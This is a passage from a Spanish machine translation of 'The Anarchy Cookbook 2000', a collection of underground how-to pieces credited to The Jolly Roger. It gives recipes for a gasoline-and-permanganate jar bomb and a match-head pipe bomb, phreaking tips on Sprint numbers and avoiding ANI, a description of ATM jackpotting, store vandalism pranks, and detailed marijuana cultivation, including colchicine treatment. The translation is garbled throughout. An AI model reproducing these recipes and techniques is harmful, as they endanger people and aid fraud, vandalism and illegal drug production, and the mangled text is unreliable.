Rumores: ¿Por qué difundirlas?¿Alguna vez se cansa de escuchar rumores? Ya sabes, alguien recibe un impulso de impresionar a los demás, por lo que crear un rumor de que alguna compañía de larga distancia está utilizando un equipo de rastreo. ¿Por qué empezar los rumores? Sólo asusta a otros fuera de phreaking, y luego te hace, la persona que inició el rumor, se parecen a Mr. Big. Este artículo es corto, pero hay que hacerle consciente de los rumores de que personas distribuidas para su beneficio personal. Lo mejor que puedes hacer es designar como titular el rumor y luego dejarlo en eso. Usted no debe trapo en ellos constantemente, ya que si los otros usuarios no pueden determinar si es un hecho o un rumor, entonces ellos deben sufrir las consecuencias.

The New Sprint FON Tarjetas TelefónicasEE.UU. Sprint se ha abierto una nueva red de larga distancia llamada la Red de Fibra Óptica (FON), en el que los abonados tengan tarjetas de llamadas. Estas tarjetas de visita son de 14 dígitos, y sin embargo, parece generado aleatoriamente, en realidad son encriptados. Los rumores que flotan alrededor de la gente ser atrapado con las tarjetas telefónicas de Sprint FON son hechos, no rumores. La razón la gente se está atrapado es que confunden las tarjetas de llamadas de FON con los códigos locales de autorización del puerto 950. Si usted recuerda, nunca se utiliza AT & T, las tarjetas de llamadas desde el teléfono de su casa usted. Tiene la capacidad ANI, que no está trazado, sino más bien el número de teléfono de origen se coloca en la factura tan pronto como se completa la llamada. Ellos saben que su número de teléfono cuando se llama a la puerta de acceso 800, pero no se graba hasta que su llamada se ha completado. También, a través de varios de mis trucos, me encontré con algunos datos interesantes que rodea a la nueva red de Sprint. Se enumeran a continuación.

800-877-0000 - Este número es para obtener información sobre 800 EE.UU. Sprint servicio de tarjeta de llamada. No he jugado un rato con él, pero creo que es un problema o ayudar con las tarjetas de llamadas de FON. No estoy seguro si es por la suscripción a la red FON.800-877-0002 - Se escucha un tono corto, y luego nada.800-877-0003 - EE.UU. Sprint Canal Alfa prueba n º 1800-877 - (0,004 a 0.999) - Al llamar a estos números, se obtiene una grabación diciendo: "Bienvenidos a un servicio más EE.UU. de Sprint." Cuando la grabación se detiene, si se pulsa la tecla numeral (#) obtendrá el tono de marcación de tarjeta de llamada.

Otros relacionados con el número de Sprint800-521-4949 - Este es el número que usted se suscribe a EE.UU. Sprint. También puede suscribirse a la red FON en este número. Tomará de 4 a 5 semanas para que su tarjeta telefónica para llegar.10777 - Este es el número de la igualdad de acceso EE.UU. de Sprint. Al marcar este número, a continuación, marcar el número al que llama, y se le cobrará a través de EE.UU. Sprint, y usted recibirá su línea de larga distancia para esa llamada. Tenga en cuenta que se le cobrará por las llamadas realizadas a través de la igualdad de acceso. No se debe confundir que es un método de phreaking, si no se utiliza desde una ubicación remota. Si usted está en un servicio de EE.UU. Sprint + y llame al 1 +700-555-1414, que le dirá qué compañía de larga distancia que esté utilizando. Cuando usted oye: "Gracias por elegir un servicio más EE.UU. Sprint", presione la tecla numeral (#), a continuación, usted recibirá el tono de marcación EE.UU. Sprint. Sin embargo, esto es lo mismo que si usted está llamando desde el teléfono en casa si de línea directa, por lo que sería facturado para las llamadas realizadas a través de eso, pero hay maneras de utilizar esto a su ventaja, ya que en la utilización de la igualdad de acceso a través de una PBX.

Identificación automática del número (ANI)La verdadera definición para la identificación automática del número no ha sido ampliamente conocido por muchos. Número de Identificación Automática, (También conocido como: ANI), es el proceso de el número de destino conocer el número de origen, que es

Page 70: 106652012 the Anarchy Cookbook 2000 Es

donde usted está llamando. El método para conseguirlo es enviar el número de teléfono que está llamando en forma codificada por delante del número de destino. A continuación se muestra un ejemplo de esto.

ANI MétodoDial: 267-0293Enviado el: ******** 2670293* - Indica el número originario y que se codifica y se envía antes de la número

Como habrá notado, hay 8 dígitos del número de código. Ello se debe, al menos creo, se almacena en un formato binario-como. Identificación automática del número significa un futuro limitado en phreaking. ANI no amenaza phreaking mucho todavía, pero lo hará en un futuro próximo. Un sistema de conmutación de nuevo muy pronto se instalará en la mayoría de las ciudades que están cubiertos por el Sistema de ESS, de conmutación electrónica, ahora. El sistema tendrá la capacidad ANI la cual se proporcionarán a los propietarios de líneas telefónicas como un extra añadido. El teléfono del propietario tendrá un LED de lectura que muestran el número de teléfono de las personas que llaman. Usted será capaz de bloquear algunos números, por lo que la gente no puede recibir llamadas. Este sistema se encuentra en las etapas de prueba en la actualidad, pero pronto se instalará en la mayor parte del país. Como puede ver, esto va a terminar una gran parte de phreaking, hasta que nosotros, los phreakers, se puede llegar a una alternativa. Como he sido informado por varias personas, por lo general fiable, este sistema se llama ISS, que no estoy seguro del significado de esto, y se está probando actualmente en Rhode Island. 800 vatios de potencia en las líneas establecidas por ANI apoyo de AT & T. El equipo de descifrar un código ANI número de origen hace que no cuesta tanto como cabría esperar. 950 puertos no ofrecen la capacidad de ANI, no importa lo que han dicho. Los 950 puertos sólo dará a la ciudad en la que se basan, este. Por lo general es el más grande en el estado, a veces la capital Una última cosa que debo decir es que ANI no está relacionado con el rastreo. El seguimiento se puede hacer en cualquier número ya sea local, 950, etc Una forma de evitar esto, especialmente cuando se marca Teleconferencia de la Alianza, es marcar a través de varias extensiones o puertos. ANI sólo cubrirá el número que está llamando, y si llama a través de un número que no es compatible con ANI, su número nunca se sabrá.

68. Jackpotting Cajeros por The Jolly Roger

JACKPOTTING se llevó a cabo con bastante éxito hace un tiempo en (lo has adivinado) Nueva York. Lo que los culpables se fue Sever (en realidad cruzar) la línea entre la ATM y el anfitrión. Inserte una microcomputadora entre la ATM y el anfitrión. Inserte una tarjeta fraudulenta en el cajero automático. (. Mediante tarjeta de tarjeta de débito que quiero decir, no hardware) Lo que hizo fue el cajero automático: enviar una señal a la máquina, diciendo: "Hey ¿Puedo darle este dinero chico, o se rompió, o es su tarjeta no válida?" Lo que hizo fue el microordenador: interceptar la señal desde el host, descartar, enviar "no hay nadie usando el cajero automático" de la señal. Lo que hizo fue el anfitrión: obtener el "no uso de una" señal, enviar una copia de seguridad "está bien, entonces por amor de Dios no escupir todo el dinero!" señalar a la ATM. Lo que el microprocesador se fue interceptar la señal (de nuevo), tirarlo a la basura (de nuevo), enviar "¡Wow! Ese tipo es como demasiado rico! Déle todo el dinero que él quiere. De hecho, está tan cargado, darle toda la dinero en efectivo que tenemos! Él es realmente un cliente valioso. " señal. Lo que hizo el cajero automático: ¿qué más? Obediente prescindir de dinero en efectivo hasta que las vacas a casa (o casi). Lo que los ladrones dieron fue muy por encima de $ 120.000 (para el trabajo un fin de semana), y desde hace varios años, cuando fueron capturados. Esta historia fue usada en una conferencia de CRIPTOGRAFÍA asistí hace un tiempo para demostrar la necesidad de seguridad de la información mejor. Las líneas entre los cajeros automáticos y sus anfitriones son generalmente "débil" en el sentido de que la información que por ellas es por lo general no cifrado de ningún modo. Una de las maneras en que puede ser derrotado JACKPOTTING es encriptar la información que pasa entre la ATM y el anfitrión. Mientras la llave no se puede determinar a partir del texto cifrado, la transmisión (y por tanto la transacción) sea segura. A más creíble, la historia podría referirse técnicamente precisa una persona que usa una computadora entre la ATM y el ejército

Page 71: 106652012 the Anarchy Cookbook 2000 Es

para determinar la clave antes de que realmente engañar al anfitrión. Como todos saben, la gente a encontrar el criptoanálisis de un tema muy emocionante y apasionante .. ¿no? (Je-je)

___________| | - << - | | - << - | || ATM | micro | Host || ___ | - >> - | | - >> - | ____ |

El Bank of America de cajeros automáticos están conectados a través de líneas dedicadas a un equipo como el obispo dijo. Sin embargo, para fines de mantenimiento, hay al menos una separada de marcación de línea también va a que mismo equipo host. Este tipo básicamente BS'ed su camino a través del teléfono hasta que encontró a alguien lo suficientemente estúpido como para darle el número. Después de encontrar que había truco tiene Apple en el código. Simple.

Después, él tenía un amigo ir a un cajero automático con cualquier B de A tarjeta de cajero automático. Se quedó en casa con la de Apple conectado a la máquina. Cuando su amigo insertado la tarjeta, el anfitrión se muestra. El tipo con el Apple ha modificado el estado y número de la tarjeta directamente en la memoria del receptor. Se volvió la tarjeta en una tarjeta de seguridad, que se utiliza para propósitos de prueba. En ese momento, el cajero hizo lo que el operador que dijo que hiciera.

Al día siguiente, entró en el banco con los $ 2000 recibió, habló con el gerente y le dijo que todos los detalles de lo que había hecho. El director le dio su tarjeta de visita y le dijo que él tenía un trabajo esperando por él cuando salió de la escuela.

Ahora, Bank of America ha sido advertido, que podría haber cambiado el sistema. Por otro lado, sería horrible cara para hacer eso en todo el país, cuando sólo un puñado de personas que cuentan con los recursos y menos aún tienen la inteligencia para duplicar la hazaña. ¿Quién sabe?

69. Jarra Bomb de The Jolly Roger

Tome una jarra de cristal, y puso 3 a 4 gotas de gasolina en el mismo. Entonces poner el tapón en, y el gas buches la vuelta para la superficie interior de la jarra se recubre. A continuación, agregue unas gotas de solución de permanganato de potasio en ella y fijar un tope. Para hacerlo explotar, ya sea tirar de algo, o rodar algo.

70. Diversión en K-Mart por The Jolly Roger

Bueno, para empezar, uno debe darse cuenta de la importancia de K-Mart en la sociedad actual. En primer lugar, K-Mart ofrecen las cosas más baratas para aquellos que no pueden permitirse el lujo de comprar en las tiendas de mayor calidad. A pesar de que todo lo que veo allí es las minorías y la Tercera Edad, y los pobres de nuestra ciudad. Personalmente, yo no sería atrapado muerto en ese país. Pero, una vez, lo hice. Usted ve, una vez que, después de la Luna y el caos Roach Havoc (Queridos amigos de la mía) y yo estábamos explorando esas cosas divertidas como tejados, nos encontramos a lo largo de un K-Mart. Divertido, y el frío para el caso, vagamos pulgadas aumenta la tensión. A medida que se acercó a la entrada, fuimos atacados por grupos de jóvenes cerca de la venta de galletas baratas y las personas en silla de ruedas sticken venta de banderas estadounidenses. Después de reírse de estas personas, entramos. Aquí es donde empieza la verdadera diversión ... En primer lugar, que paseaba por la tienda, y encendió todas las luces azules que encontramos. Eso sí que distrae y confunde a los attendents ... Diversión ... Lo bueno en primer lugar, es para ir a la sección de la tienda donde se venden computadoras. La oscuridad envuelve a la tierra el día que se encuentra Apple Computers que se venden allí. En cambio, menos computadoras, como la risa C-64 se puede encontrar allí ... Turn it on, y asegurarse de que nadie lo está viendo ... Entonces, una vez en el tipo básico, ...

] 10 PRINT "A la mierda el mundo! La anarquía reina!" (O algo por el estilo.)] 20 GOTO 10 y pie.

Page 72: 106652012 the Anarchy Cookbook 2000 Es

Asimismo, establecer los radios de la muestra en la tienda de una estación de rock satánico, y apagar la radio. A continuación, establezca la alarma durante dos minutos antes de la hora que se muestra allí. Suba el volumen hasta el final, y el pie. Después de aproximadamente dos minutos, verá el secretario débilmente intentar encender la radio o apáguela. Es realmente fantástico para establecer diez o más radios para las diferentes estaciones, y se aleje. Una de mis cosas favoritas para hacer, es conseguir que en el sistema de intercomunicación de la tienda. Es más fácil escribir a continuación, hacer. En primer lugar, echa un vistazo a el departamento de jardinería. Usted dice que no hay atendieran allí? Buena. Escondidas con cuidado sobre el teléfono detrás del mostrador barata allí, y lo recoges. Marque el número correspondiente al elemento que dice "PAGE" ... Y hablar. Usted notará que su voz se hará eco de todas partes de las entrañas de K-Mart. Yo sugeriría que anuncia algo en las líneas de: "¡La anarquía reina"

71. Mace Suplente por el Jolly Roger

• 3 partes de alcohol

• ½ parte de yodo• ½ parte de sal

-O-• 3 partes de alcohol• 1 parte de sal yodada (Morton)

No es maza real, pero hace un trabajo muy bueno en los ojos ...

72. ¿Cómo hacer crecer la marihuana en el Jolly Roger

MARIHUANALa marihuana es una planta de hoja caduca que crece a partir de semillas. La sección fibrosa de la planta fue (ha sido reemplazado por productos sintéticos) que se utiliza para hacer cuerdas. Las partes superiores con flores, hojas, semillas, y la resina de la planta es utilizada por casi todo el mundo para drogarse. Normalmente, las partes vegetales de la planta se fuma para producir este "alto", pero también puede ser comido. El ingrediente activo en la resina de la marihuana es el THC (Tetahydrocannabinol). La marihuana contiene THC del 1% -4% (4% debe ser considerada la droga BUENA). La marihuana crece silvestre en muchas partes del mundo, y se cultiva en México,Vietnam,África,Nepal,India,América del Sur, Etc La marihuana vendida en el Estados Unidos proviene principalmente de, sí, el Estados Unidos. Se estima que por lo menos 50% de la hierba en las calles en América es de cosecha propia. El grupo más grande de al lado viene a través de las fronteras de la México, Con cantidades más pequeñas de filtrado en Panamá, Ocasionalmente América del SurY, en ocasiones, África. El hachís es la resina pura de la planta de marihuana, que se raspa de las inflorescencias de la planta y agrupados. Ganja es la parte superior hasta el suelo de las mejores plantas. (También es el nombre dado a cualquier tipo de marihuana en Jamaica.) La marihuana se deteriora en unos dos años si se expone a la luz, el aire o el calor. Siempre se deben almacenar en lugares frescos. Los precios de la hierba en el Estados Unidos son un reflejo directo de las leyes de la oferta y la demanda (y usted pensó que la economía de la escuela secundaria no sería útil). Una serie de bustos grandes fronteras, un corto período de crecimiento, una mala cosecha, cualquier número de cosas pueden hacer que el precio de la marihuana hacia arriba. La demanda todavía parece estar en aumento en el EE.UU., Por lo que los precios rara vez caen por debajo del nivel del año pasado. Cada año, una sequía estacional pequeña se produce, como el abastecimiento del año pasado se agota, y la cosecha del próximo año todavía no está puesta. Los precios suelen subir un 20% -75% durante este tiempo y luego se vuelve a la "normalidad". Sin lugar a dudas, una gran escasez de hierba hace que un porcentaje de fumadores que recurrir a drogas más fuertes en su lugar. Por esta razón, no existe un programa de control de la hierba jamás puede ser beneficioso o "éxito".

Hazlo Crecer!

Page 73: 106652012 the Anarchy Cookbook 2000 Es

Hay una manera segura de evitar los altos precios y el DT es la hierba: Cultiva tu propia. Esto no es tan difícil como algunas "autoridades" sobre el tema que te hacen creer. La marihuana es una hierba, y uno bastante animada en eso, y va a crecer casi a pesar de usted.

AL AIRE LIBREContrariamente a la creencia popular, la hierba crece bien en su lugar a muchos en el continente de América del Norte. Se va a florecer, aunque la temperatura no suba de 75 °. Las plantas necesitan un mínimo de ocho horas de sol al día y se deben plantar a finales de abril / principios de mayo, pero definitivamente, después de la última helada del año. El crecimiento de una al aire libre, o "al natural", la cosecha ha sido el método favorito en los últimos años, porque la hierba parece crecer mejor fuera tanta atención cuando está en su hábitat natural. Por supuesto, un escenario al aire libre, requiere precauciones especiales que no se encuentran con un cultivo en interiores, sino que debe ser capaz de evitar la detección, tanto de los fanáticos de aplicación de la ley y los monstruos comunes, ambos de los cuales se llevará a su mala hierba, y probablemente lo use. Por supuesto, también se le arrestará. También debe tener acceso a la zona para preparar la tierra y cosechar el cultivo. Hay dos escuelas de pensamiento acerca de cómo iniciar las semillas. Se dice que usted debe comenzar a las plantas durante unos diez días en una caja interior del arrancador (ver la sección de interior) y luego el trasplante. La otra teoría es que sólo debería comenzar en el lugar correcto. Menos plantas se van a plantear con este método, pero no hay choque de trasplante para matar a algunas de las plántulas a medio camino. El suelo debe estar preparado para los pequeños diablos dándole la vuelta un par de veces y añadir una taza de cal hidratada por metro cuadrado de suelo y un poco (no demasiado, ahora) de fertilizante de nitrógeno soluble en agua buena. El suelo ahora se riega varias veces y se dejó reposar aproximadamente una semana. Las plantas se deben plantar por lo menos tres pies de distancia, consiguiendo demasiado codiciosas y apilarlas demasiado cerca darán lugar a plantas impedidas. Las plantas, como un poco de agua durante la temporada de crecimiento, pero no demasiado más. Esto es especialmente cierto alrededor de las raíces, el agua como demasiado se pudrirán el sistema radicular. La hierba crece bien en el maíz o el lúpulo, y estas plantas ayudarán a proporcionar algo de camuflaje. No crece bien con centeno, espinaca, o pepperweed. Es probablemente una buena idea para plantar en muchos remiendos pequeños, rotos, pues la gente tiende a notar patrones.

INFORMACIÓN GENERAL DE CRECIMIENTOTanto el macho y hembra planta producir resina de THC, aunque el macho no es tan fuerte como la hembra. En una buena cosecha, el hombre seguirá siendo un montón para fumar y no se debe tirar en cualquier circunstancia. La marihuana puede alcanzar una altura de veinte pies (o prefieres deseo a una estrella) y obtener un diámetro de 4 pulgadas y media. Si es normal, que tiene una proporción de sexos de aproximadamente 1:1, pero esto puede ser alterado de varias maneras. La planta macho muere en la 12 ª semana de crecimiento, la hembra va a vivir otros 3-5 semanas para producir sus younguns. Las hembras pueden llegar a pesar el doble que los hombres cuando están maduras. La marihuana debe compactar el suelo cuando se aprieta, pero también debe romperse con una pequeña presión y absorber el agua de pozo. Una prueba buena para el cultivo de interior o al aire libre es para añadir un montón de gusanos en el suelo, si es que vivir y andar, es un buen suelo, pero si no lo hacen, así, cambiarlo. Los gusanos también ayudan a mantener el suelo lo suficientemente floja como para que las plantas crezcan bien.

SEMILLASPara obtener buenos pastos, usted debe comenzar con las semillas adecuadas. Un buen punto de partida es el de salvar las semillas de la mejor forma de lotes que hayan consumido. Las semillas deben ser viril, es decir, que no debe ser de color gris y arrugado, pero que aparece verde, carnoso, y saludable. Una prueba interesante es dejar caer las semillas en una sartén caliente. Si "crack", que son probablemente bueno para la plantación de los propósitos. Las semillas se deben empapar en agua destilada durante la noche antes de la siembra. ASEGÚRESE de planta en el suelo con la punta afilada UP. Planta de semillas sanas de ½ "de profundidad. Brotarán en cerca de cinco días.

BROTACION

Page 74: 106652012 the Anarchy Cookbook 2000 Es

La mejor de todo método de germinación es, probablemente, para hacer una caja de germinación (como se vende en los viveros) con un fondo programado o utilizar vasos de papel con agujeros en el fondo. El suelo debe estar brotando de una mezcla de humus, tierra, arena y cinco con un poco de abono orgánico y agua mezclados en aproximadamente una semana antes de la siembra. Cuando esté listo para el trasplante, usted debe estar seguro y dejar una bola de tierra alrededor de las raíces de cada planta. Esta pelota se deja caer en toda una bodega de béisbol de tamaño en el suelo permanente. Si usted está creciendo / transplante en el interior, se debe utilizar una luz verde de seguridad (se compra en viveros) durante la operación de trasplante. Si usted está trasplantando al aire libre, debe hacerlo en el momento cerca de dos horas antes de la puesta de sol para evitar daños a la planta. Siempre use guantes de algodón para manipular las plantas jóvenes. Después de las plantas se colocan en el agujero, debe regarlas. También es una buena idea utilizar un producto químico comercial del trasplante (también comprado en viveros) a continuación para ayudar a superar el shock.

Cultivo de interiorEl cultivo en interior tiene muchas ventajas, además del hecho evidente de que es mucho más difícil hacer que su cosecha "que se encuentra," usted puede controlar las condiciones ambientales exactamente como usted desee y obtener una garantía de "buena" de la planta. Las plantas cultivadas en el interior no se parece lo mismo que sus primos al aire libre. Serán escuálido que aparece con un tallo débil e incluso puede requerir que los atan a un poste cada vez mayor para permanecer en posición vertical, PERO TENDRÁN RESINA TANTO O MÁS! Si cada vez mayor en un cuarto, usted debe poner el papel de alquitrán en los pisos y luego comprar bolsas esterilizadas de forma del suelo en un vivero. Usted necesitará cerca de un pie cúbico de suelo de cada planta. Las plantas se necesitan alrededor de 150 ml. de agua por planta / por semana. Ellos también necesitan aire fresco, así que la habitación debe estar ventilada. (Sin embargo, el aire fresco no debe contener humo de tabaco.) Por lo menos ocho horas de luz al día debe ser proporcionada. A medida que aumenta la luz, las plantas crecen más rápido y muestran más mujeres o menos hombres. Dieciséis horas de luz al día parece ser la mejor combinación, más allá de esto hace diferencia apreciable poca o ninguna en la calidad de la planta. Otra idea es interrumpir el ciclo de la noche con aproximadamente una hora de luz. Esto le da más mujeres. Las paredes de tu cuarto de cultivo deben ser pintadas de blanco o cubiertos con papel de aluminio para reflejar la luz. Las luces se pueden ser tanto de bombillas fluorescentes. Figura de unos 75 vatios por planta o una planta por metro de tubo fluorescente. Los fluorescentes son los mejores, pero no use "blanco frío" tipos. Las fuentes de luz debe ser un promedio de veinte centímetros de la planta y nunca a menos de 14 pulgadas. Ellos pueden ser montados en un bastidor y se trasladó cada pocos días como las plantas crecen. Las mejores fuentes de luz muy son los fabricados por Sylvania y otros, especialmente para el cultivo de plantas (como el "gro lux" tipos).

Cosecha y secadoLas plantas masculinas serán más altos y tienen alrededor de cinco sépalos de color verde o amarillo, que se abren para fertilizar la planta hembra con polen. La planta femenina es más corta y tiene una flor pistilada pequeña, que en realidad no se parece a una flor, sino más bien un pequeño manojo de hojas en un clúster. Si usted no quiere que las semillas, sólo una buena droga, usted debe escoger a los machos antes de verter el polen como la hembra utilizará parte de su resina para hacer las semillas. Después de otros tres a cinco semanas, después de que los hombres se han ido, las hembras comienzan a marchitarse y morir (de la soledad?), Este es el momento de elegir. En algunos países de Oriente Medio nefastos, los agricultores de los informes, poner sus colmenas junto a los campos de marihuana. Los diablillos recoger el polen de gramíneas por su miel, que se supone que contiene una dosis justa de THC. La miel es entonces disfrutado por métodos convencionales o hecho en ambrosía. Si usted quiere las semillas - que los hombres derramó su polen a continuación, elegir él. Deje que la mujer vaya por otro mes y recogerla. Para curar las plantas, que debe ser secado. En cultivos grandes, esto se logra mediante la construcción de un cuadro de secado o secado ambiente. Usted debe tener una fuente de calor (por ejemplo, un calentador eléctrico), que hará que la caja / el cuarto cada uno de 130 °. La caja / habitación debe estar ventilada para llevar fuera del aire el vapor de agua cargada y reemplazarlo con un nuevo. Una buena caja puede ser construido a partir de una caja de naranjas con fibra de vidrio las paredes aisladas, conductos de ventilación en la parte superior y

Page 75: 106652012 the Anarchy Cookbook 2000 Es

estantes para que contenga las hojas. Debe haber un deflector entre las hojas y la fuente de calor. Una cura rápida para cantidades más pequeñas es: cortar la planta a nivel del suelo y lo envuelve en un paño para no perder las hojas. Sacar las semillas a mano y tienda. Coloque todas las hojas en una bandeja de horno o papel de aluminio y los puso en el estante medio del horno, que se encuentra en "asar a la parrilla." En pocos segundos, las hojas se fuman y acurrucarse, remover a su alrededor y dar otros diez segundos antes de llevarlos a cabo.

PARA AUMENTAR LAS COSAS BUENASHay varios trucos para aumentar el número de mujeres, o el contenido de THC de las plantas: Usted puede hacer que las plantas maduran en 36 días si usted está en un apuro, mediante la reducción de la luz a cerca de 14 horas, pero las plantas no ser tan grande. Poco a poco debe acortar el ciclo de luz hasta llegar a catorce horas. Usted puede dejar ningún tipo de riego ya que las plantas empiezan a hornear el aumento de la resina de las flores. Esto aumentará la resina un poco. Usted puede usar una lámpara solar en las plantas a medida que comienzan a desarrollar tallos de las flores. Usted puede cortar con tijeras la flor, justo en el lugar donde se une con la planta, y una nueva flor se forma en un par de semanas. Esto se puede repetir dos o tres veces para obtener flores varias veces más de lo habitual.Si las plantas se rocían con Ethrel al principio de su fase de crecimiento, se producen casi todas las plantas femeninas. Por lo general, se acelera la floración también puede ocurrir en tan sólo dos semanas. Usted puede emplear un cambiador de crecimiento llamado colchicina. Esto es un poco difícil de conseguir y costoso. (En caso de ser ordenados a través de un laboratorio de algún tipo y cuesta unos 35 dólares por gramo.) Para utilizar la colchicina, se debe preparar la solución de remojo de agua destilada con el 0,10 por ciento colchicina. Esto hará que muchas de las semillas germinan a morir y no, pero los que vienen para arriba serán plantas poliploides. Esta es la diferencia entre las cepas aceptada como "oro" y la hierba normal, y la tuya DEFINITIVAMENTE superhierba ser. El problema aquí es que la colchicina es un veneno en grandes cantidades y pueden ser tóxicos en la primera generación de las plantas. Bill Frake, autor de CONNOISSEUR MANUAL DE MARIHUANA ejecuta un tratamiento con colchicina muy completo abajo y advierte en contra de fumar las plantas de primera generación (todas las generaciones venideras también serán poliploide), ya que de esta calidad venenosa. Sin embargo, el Índice Médico colchicina muestra que se da en cantidades muy pequeñas a las personas para el tratamiento de diversas dolencias, si. Aunque estas cantidades son pequeñas, parece ser más grande que cualquiera puede recibir la forma de fumar una planta de semilla tratada. Sería una buena idea comprar una copia de los entendidos, si usted está planeando para intentar esto, y leer las instrucciones completas el Sr. Drake. Otro proceso que aún es experimental para aumentar la resina para evitar el paso de las puntas de las hojas tan pronto como aparecen desde el momento en la planta está en la etapa de plántula a través de toda su vida útil. Esto produce una distorsión, destrozado de aspecto vegetal que sería muy difícil de reconocer como la marihuana. Por supuesto, hay menos sustancia a esta planta, pero esas criaturas destrozadas han sido conocidos para producir tanta resina que se cristaliza un hash fuerte en toda la superficie de la planta - podría ser conveniente probarlo en una planta o dos y ver lo que pasa.

PLANTA DE TABLA DE PROBLEMASiempre verifique las condiciones ambientales en general antes de emitir un juicio - la tierra alrededor de pH 7 o un poco menos - un montón de agua, luz, aire fresco, tierra suelta, sin agua estancada en las piscinas.

SÍNTOMA PROBABLEMENTE PROBLEMA / CUREGrandes hojas se tornan amarillas - pequeñas hojas aún verdes. La deficiencia de nitrógeno - Aumento de nitrato de sodio o de abono orgánico.Las hojas más viejas se cerrarán en los bordes, color oscuro, posiblemente con un tono púrpura. La deficiencia de fósforo - añade el fosfato comercial.Las hojas adultas desarrollan un tono amarillento a las regiones menos veniales. La deficiencia de magnesio - agregar el fertilizante comercial con un contenido de magnesio.

Page 76: 106652012 the Anarchy Cookbook 2000 Es

Las hojas maduras se vuelven amarillas y luego se vio con las zonas de borde se vuelve gris oscuro. La deficiencia de potasio - añade cloruro de potasio.Tallos rotos, sin el apoyo de tejidos sanos. La deficiencia de boro - añadir ningún alimento vegetal que contiene boro.Las pequeñas hojas arrugadas con sistemas de vetas amarillentas. La deficiencia de zinc - Aumento de alimentos de origen vegetal comercial que contiene zinc.Las hojas jóvenes se deforman, posiblemente color amarillento. La deficiencia de molibdeno - utilizar cualquier alimento de las plantas con un poco de molibdeno en el mismo.

EXTRA SECCIÓN: mala hierba WEED / BUENA¿Se puede convertir en la hierba mala hierba buena? Sorprendentemente, la respuesta a esta pregunta a menudo se plantea es, ¡sí! Al igual que muchas otras cosas en la vida, la cantidad de bien que van a hacer se relaciona directamente con la cantidad de esfuerzo que se va a poner en él. No hay instantáneas, productos de supermercado que se puede rociar sobre Kansas hierba gatera y han wonderweed, pero hay una serie de procesos simplificados, de bajo costo (Gee, el Sr. Asistente!), Que mejorará la hierba un poco mediocre, y hay un par de muy involucrados los procesos que hacen a casi el perejil, incluso las malas hierbas en algo digno de escribir a casa alrededor.

FACILITA1. Colocar la droga en un recipiente que permite al aire entrar en un modo restringido

(tal como una lata con agujeros de los clavos perforados en la tapa) y añadir un montón de hielo seco, y el lugar todo el asunto en el congelador durante unos pocos días. Este proceso va a añadir una cierta cantidad de potencia para el producto, sin embargo, esto sólo funciona con hielo seco, si se utiliza hielo normal, congelador todos los días, usted va a terminar con un desastre empapado ...

2. Tomar una cantidad de hierba y se humedezca, el lugar en una holgada o en otro recipiente socialmente aceptable, y guárdelo en un lugar oscuro, mojado por un par de semanas (enterrar también parece funcionar). La hierba se desarrollará un molde que tiene un sabor un poco duro, una y se quema un poquito raro, pero no aumenta la potencia.

3. Exponer la hierba a la luz de alta intensidad de una lámpara solar durante todo un día o algo así. Personalmente, no creo que esto vale la pena el esfuerzo, pero si sólo gastó $ 400 de dinero de su amigo para este ladrillo de super-colombianos, el derecho-de-la-President's-personal-alijo, y que resulta ser las malas hierbas de Missouri, y que está a empacar sus maletas para abandonar la ciudad antes de que las personas llegan por sus acciones, así, es posible que por lo menos intentarlo. No puede hacer daño.

4. Tome las partes no deseadas de nuestro escondite (tallos, semillas de malas hierbas débil, gusanos, etc) y colóquelos en una olla tapada, con suficiente alcohol para cubrir todo. Ahora CUIDADOSAMENTE hervir la mezcla en una estufa eléctrica o un mechero de laboratorio. No use gasolina - el alcohol es muy inflamable. Después de 45 minutos de calor, retire la olla y colar los sólidos, el ahorro del alcohol. Ahora, repita el proceso con los mismos residuos, pero el alcohol fresco. Cuando el segundo hervor, retirar los sólidos otra vez, combinar las dos cantidades de alcohol y vuelva a hervir hasta que tenga una mezcla de jarabe. Ahora, esta mezcla de jarabe que contiene la mayor parte del THC hasta ahora oculto en los tallos y tal. Uno simplemente toma este jarabe del fondo se combina con la hierba que se desea mejorar.

SECCIÓN ESPECIAL SOBRE MARYGIN tema relacionadoMarygin es un anagrama de las palabras de la marihuana y la ginebra, como en Eli Whitney. Se trata de un vaso de plástico que actúa muy parecido a una desmotadora de algodón comercial. Una toma alrededor de una onza de una hierba y se rompe para arriba. Esto se coloca entonces en el Marygin y el mando que sobresale es girado. Esta acción hace girar la rueda interior, que separa la hierba de los restos (semillas, tallos). No

Page 77: 106652012 the Anarchy Cookbook 2000 Es

pulverizar el pasto como las pantallas tienen un hábito de hacer y es fácilmente lavable.

Marygin está disponible en:P.O. Caja 5827Tucson,Arizona 85703$ 5.00

GRASS Edmund Scientific Company 555 Edificio Edscorp Barrington, Nueva Jersy 08007

Catálogo gratis es una maravilla de las cosas buenas para el cultivador de la hierba potencial. Tienen un invernadero termostato eléctrico para iniciar las plantas. Las luces que se aproximan al equilibrio de color real del sol y son probablemente los tipos más beneficiosos disponibles: de 40 vatios, 48 pulgadas bulbo dom cubierta, de 75 vatios y 150 Y, tienen un regulador de crecimiento natural para las plantas (giberelina), que puede cambiar la altura, acelerar el crecimiento y la madurez, promover la floración, etc Cada planta reacciona de manera diferente al tratamiento con giberelina ... no hay diversión, como la experimentación.

PROPUESTAS LECTURALos entendidos MANUAL DE LA MARIHUANA, Bill Drake

Editorial Straight Arrow - $ 3 ½ 0625 Third StreetSan Francisco,California

FLASHP.O.Box 16098San Fransicso,California 94116

Las acciones de una serie de folletos sobre la hierba, la fabricación de droga, la cocina. Incluye la serie de Mary Jane superhierba.

73. Coincidir bomba cabeza por la Jolly Roger

Simples cabezas de las cerillas de seguridad en un tubo, con un máximo en los dos extremos, hacer una bomba devastadora. Se encuentra con un fusible. Un plástico holgado se coloca en el tubo antes de que las cabezas de ir en para evitar la detonación por contacto con el metal. Cortar cabezas de las cerillas suficientes para llenar la tubería puede ser un trabajo tedioso para uno, pero la diversión de una noche para la familia si usted puede arrastrar fuera de la TV.

74. ¿Cómo para atemorizar a McDonalds por The Jolly Roger

